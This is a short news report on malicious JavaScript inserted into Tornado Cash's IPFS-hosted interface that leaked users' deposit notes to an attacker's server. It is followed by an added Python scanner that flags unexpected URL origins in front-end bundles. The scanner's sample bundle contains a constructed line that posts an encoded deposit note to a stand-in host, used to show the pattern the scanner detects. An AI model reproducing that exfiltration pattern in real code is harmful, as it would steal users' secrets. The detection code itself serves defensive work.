27 February 2024

Tornado Cash users’ funds at risk due to malicious code

Deposits made to Tornado Cash, a well-known crypto privacy tool favored by hackers, may be at risk after malicious code was inserted into certain user interfaces.

Tornado Cash, a decentralized privacy solution on the Ethereum blockchain, offers users non-custodial and anonymous transactions through a cryptocurrency mixer, enhancing privacy and security.

The security breach came to light through a Medium post by Gas404, a community member. The attack appears to have been orchestrated by an individual posing as a Tornado Cash developer who embedded malicious JavaScript code within the project’s user interface. This code stealthily captured and transmitted users' private deposit notes to an unauthorized external server. These deposit notes serve as crucial access keys for managing funds within Tornado Cash.

The encoded private deposit notes were covertly sent to the attacker's server under the guise of routine function calls, meaning users' private information was leaked without their awareness whenever they interacted with specific Tornado Cash functions.

The exploit primarily targeted users accessing Tornado Cash via IPFS gateways, such as ipfs.io and cf-ipfs.com, which serve the decentralized web content on which the Tornado Cash interface is hosted. The malicious code was hidden within a governance proposal, making detection challenging for average users.

This code redirected user deposit information to a server controlled by the attacker.

All Tornado Cash servers deployed on the IPFS network since January 1, 2024, are believed to have been impacted.
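As an added defender-side example (not code from the article or from the Tornado Cash project), the check below scans a front-end JavaScript bundle, for instance one fetched from an IPFS gateway before it is trusted, for hard-coded URLs whose origin is not on an expected list, and notes any outbound network sink on the same line. The sample bundle, the allow-list and every hostname in it are constructed for illustration.

```python
import re
from urllib.parse import urlparse

# Browser APIs a script can use to ship data off the page. A URL to an
# unexpected origin on the same line as one of these deserves a close look.
OUTBOUND_SINKS = ("fetch(", "XMLHttpRequest", ".send(", "sendBeacon(",
                  "WebSocket(", ".src=", ".src =")

# Matches quoted http(s)/ws(s) URL literals inside JS source text.
URL_RE = re.compile(r"""['"`]((?:https?|wss?)://[^'"`\s]+)['"`]""")


def find_unexpected_origins(bundle_src: str, allowed_origins: set[str]) -> list[dict]:
    """Return one finding per URL literal whose origin is not allow-listed.

    Each finding records the line number, the offending origin and which
    outbound sinks (if any) appear on that line.
    """
    findings = []
    for lineno, line in enumerate(bundle_src.splitlines(), 1):
        for url in URL_RE.findall(line):
            parsed = urlparse(url)
            origin = f"{parsed.scheme}://{parsed.netloc}"
            if origin in allowed_origins:
                continue
            sinks = [s for s in OUTBOUND_SINKS if s in line]
            findings.append({"line": lineno, "origin": origin, "sinks": sinks})
    return findings


# Constructed sample bundle: a legitimate RPC call followed by the pattern the
# article describes, a deposit note sent to an origin the UI should never contact.
SAMPLE_BUNDLE = """
const RPC = "https://rpc.example.invalid/v1";
const GATEWAY = "https://ipfs.io/ipfs/";
async function deposit(note) {
  await provider.send("eth_sendTransaction", [tx]);
  // constructed: the note is encoded and posted to an unexpected origin,
  // disguised as just another network call
  fetch("https://collector.example.invalid/api", {method: "POST", body: btoa(note)});
}
"""

# Constructed allow-list: the RPC endpoint and the gateway the UI is built for.
ALLOWED_ORIGINS = {"https://rpc.example.invalid", "https://ipfs.io"}

if __name__ == "__main__":
    for f in find_unexpected_origins(SAMPLE_BUNDLE, ALLOWED_ORIGINS):
        print(f"line {f['line']}: unexpected origin {f['origin']} sinks={f['sinks']}")
```

The scan only sees literal URLs; a bundle that assembles its destination from fragments or decodes it at runtime needs string-decoding or dynamic analysis on top of this check.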

In August 2022, the Tornado Cash crypto mixer was sanctioned by the US authorities for its involvement in laundering money for North Korean hackers. Although the original website of the service was seized, the open-source codebase of Tornado Cash continued to exist independently, giving rise to new mixing services built upon the same framework.
